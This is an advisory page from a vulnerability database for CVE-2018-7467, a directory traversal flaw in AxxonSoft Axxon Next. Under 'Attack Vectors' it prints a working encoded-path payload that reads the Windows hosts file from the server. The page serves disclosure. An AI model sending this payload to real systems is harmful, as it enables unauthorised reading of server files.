AxxonSoft Axxon Next Directory Traversal Vulnerability

🗓️ 28 Feb 2018 00:00:00Reported by Martin A Cicalla JrType

zdt🔗 0day.today👁 79 Views

Axxon Next Client Directory Traversal Vulnerability CVE-2018-746

Reporter	Title	Published	Views	Family All 9
BDU FSTEC	The vulnerability of AxxonSoft Axxon Next video management software lies in the incorrect restriction of the path to the restricted access catalog. This allows a intruder to disclose protected information.	31 Jan 202300:00	–	bdu_fstec
CNVD	AxxonSoft Axxon Next Directory Traversal Vulnerability	28 Feb 201800:00	–	cnvd
CVE	CVE-2018-7467	27 Feb 201821:00	–	cve
Cvelist	CVE-2018-7467	27 Feb 201821:00	–	cvelist
Nuclei	AxxonSoft Axxon Next - Local File Inclusion	9 Jun 202605:43	–	nuclei
NVD	CVE-2018-7467	27 Feb 201821:29	–	nvd
Packet Storm	AxxonSoft Axxon Next Directory Traversal	28 Feb 201800:00	–	packetstorm
Prion	Directory traversal	27 Feb 201821:29	–	prion
Positive Technologies	PT-2018-3858 · Axxonsoft · Axxon Next	27 Feb 201800:00	–	ptsecurity

Title

AxxonSoft Axxon Next - AxxonSoft Client Directory Traversal via an initial
/css//..%2f substring in a URI. CVE-2018-7467

[Vulnerability Type]

Directory Traversal via an initial /css//..%2f substring in a URI

[Vendor of Product]

AxxonSoft Client

[Affected Product Code Base]

Axxon Next

[Affected Component]

AxxonSoft Client Web Application's Source Code

[Attack Type]

Remote

[Impact Information Disclosure]

true

[Attack Vectors]

It is a Directory Traversal 

 
/css//..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f
..%2f..%2f..%2f..%2fwindows\System32\drivers\etc\hosts



[Discoverer]

Martin A Cicalla Jr

#  0day.today [2018-03-14]  #

28 Feb 2018 00:00Current

7.6High risk

Vulners AI Score7.6

EPSS0.29974